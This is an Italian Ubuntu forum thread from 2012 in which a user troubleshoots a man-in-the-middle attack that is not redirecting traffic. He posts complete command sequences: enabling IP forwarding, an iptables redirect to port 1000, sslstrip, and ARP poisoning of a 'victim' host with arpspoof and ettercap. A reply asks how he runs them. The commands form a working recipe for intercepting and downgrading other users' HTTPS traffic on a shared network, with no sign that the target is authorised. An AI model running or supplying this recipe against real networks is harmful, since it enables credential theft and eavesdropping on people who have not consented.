Pagina 1 di 1

Ubuntu 11.10 - Nessun redirect durante i Mitm [iptables?]

Inviato: giovedì 12 aprile 2012, 17:36
da Evicaro
Ciao a tutti,

ho un bisogno disperato (per la mia sanità mentale, dato che sto impazzendo dietro questo problema da stamattina) di riuscire a capire perchè se faccio un MITM qualsiasi, il traffico non viene rediretto.

Non riesco ne con ettercap (testuale), ne con arpspoof.

Il mitm funziona perchè se vado sul pc vittima a controllare l'arp è effettivamente avvelenata... peccato che abbia causato un bel DOS più che un MITM...

Sslstrip funziona perchè se sul browser del mio pc metto come proxy localhost con la porta di sslstrip (uso la 1000) cattura il traffico senza problemi...

Questa è la procedura con arpspoof, tutto da root ovviamente:

Codice: Seleziona tutto


echo "1" > /proc/sys/net/ipv4/ip_forward 

cat /proc/sys/net/ipv4/ip_forward (giusto per controllare)

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 1000

sslstrip -l -k 1000

arpspoof -i wlan0 -t IP_VITTIMA IP_GATEWAY
Questa è la procedura con Ettercap, sempre da root:

Codice: Seleziona tutto


echo "1" > /proc/sys/net/ipv4/ip_forward 

cat /proc/sys/net/ipv4/ip_forward (sempre per controllare)

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 1000

sslstrip -l -k 1000

ettercap -i wlan0 -Tq -M ARP:remote /IP_VITTIMA/ //
Ho googlato per due giorni prima di aprire un thread, ma non riesco a capire il perchè... vi prego aiutatemi!!!

EDIT: mi era scappato un sudo di troppo... ma in realtà tutti i comandi sono lanciati tutti da root, quindi poco importa...

Re: Ubuntu 11.10 - Nessun redirect durante i Mitm [iptables?]

Inviato: giovedì 12 aprile 2012, 18:54
da Jambaz
ma poi dopo aver fatto iptables come lanci le due procedure ?

Re: Ubuntu 11.10 - Nessun redirect durante i Mitm [iptables?]

Inviato: giovedì 12 aprile 2012, 19:18
da Evicaro
Jambaz ha scritto: ma poi dopo aver fatto iptables come lanci le due procedure ?
Non so se ho capito bene la domanda... ma ad ogni modo apro due terminali nuovi da root e li lancio... cambia solo l'ultimo comando in base a se voglio fare arp poisoning con arpspoof o con ettercap... (e preferisco ettercap perchè arpspoof non rearpa le vittime ad attacco ultimato)...